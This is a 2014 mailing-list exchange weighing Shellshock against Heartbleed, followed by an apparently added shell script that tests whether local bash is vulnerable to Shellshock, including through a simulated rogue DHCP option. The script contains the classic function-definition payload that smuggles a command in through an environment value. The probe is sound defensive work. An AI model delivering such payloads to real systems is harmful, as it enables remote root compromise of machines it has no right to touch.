On Tue, Sep 30, 2014 at 02:24:44PM +0200, rysiek wrote:
> OHAI,
>
> > Shellshock affects clients, including admins :)
> >
> > Over DHCP you get instant root.
> >
> > Over qmail local delivery, without any interaction
> > you get the lusers' $HOME and /var/mail, and having
> > in mind the state of current kernels, the road
> > to euid 0 is not very long.
> >
> > It might affect some suid progies too.
>
> Yeah, but that means the danger level is somewhere on the "client-side root"
> side, rather than "server-side root".
>

Client side and server side are related. Would you be comfortable administering a server from a rooted client? (I can offer you a free shell to ssh out of it ;).

> > AFAICT HB didn't allow code execution, just reading memory.
>
> "Just" potentially reading plaintext passwords straight off of RAM, SSL/TLS
> certificates, GPG keys, etc., potentially (and demonstrably!) giving one a
> way not only to take over the given server, but to decrypt past saved
> communications with a given host, if the host used SSL without perfect
> forward secrecy.
>
> Shellshock is more of a "personal client hygiene" kind of bug (a bad one, but
> still); HB was "we're *all* affected and fucked, change passwords NOW and
> hope for the best".
>

If I had a budget for buying sploits, I would pay much more for Shellshock than for HB; might be wrong.

> --
> Pozdr
> rysiek
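The "over DHCP you get instant root" claim in the quoted mail rests on two things: Shellshock bash executes whatever is appended to a function definition it imports from the environment, and ISC dhclient hands lease options to its hook script (run as root) as environment variables such as new_domain_name. The probe below is an added example, not code from either poster; the payload strings and the simulated lease values (192.0.2.10 from TEST-NET-1) are constructed, and `bash -c ':'` stands in for the real dhclient-script, so nothing touches the network.

```shell
#!/bin/sh
# Added example (not from the original mail): probe whether the local bash
# still executes commands appended to a function definition imported from
# the environment, which is the Shellshock bug the thread discusses.

# shellshock_probe NAME
# Exports NAME with a constructed Shellshock payload and runs a bash that
# does nothing else. A vulnerable bash executes the trailing command while
# importing its environment, so "SHELLSHOCK" shows up on stdout.
# Prints "vulnerable" (status 1), "patched" (status 0) or "no-bash" (status 2).
shellshock_probe() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 2; }
    out=$(env "$1=() { :;}; echo SHELLSHOCK" bash -c ':' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK*) echo vulnerable; return 1 ;;
        *)            echo patched;    return 0 ;;
    esac
}

# The DHCP angle from the mail. dhclient exports lease options to its hook
# script as new_ip_address, new_domain_name, new_host_name, ... and the hook
# runs as root. A rogue DHCP server therefore chooses the contents of those
# variables; sending the payload as the domain-name option is enough.
# Simulated here with a constructed lease and bash -c ':' as the hook stand-in.
dhcp_hook_probe() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 2; }
    rogue_domain='() { :;}; echo SHELLSHOCK-DHCP'     # constructed option value
    out=$(env new_ip_address=192.0.2.10 \
              new_domain_name="$rogue_domain" \
              bash -c ':' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK-DHCP*) echo vulnerable; return 1 ;;
        *)                 echo patched;    return 0 ;;
    esac
}

main() {
    printf 'generic env var:        %s\n' "$(shellshock_probe x)"
    printf 'dhclient lease option:  %s\n' "$(dhcp_hook_probe)"
}
main
```

The probe tests the bash found on PATH; a hook script with a `#!/bin/bash` line uses /bin/bash, so run it with PATH pointing at the same binary the hook would use. Both probes must agree, since bash imports every environment variable the same way; only the delivery channel (a rogue DHCP server instead of a local shell) differs.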
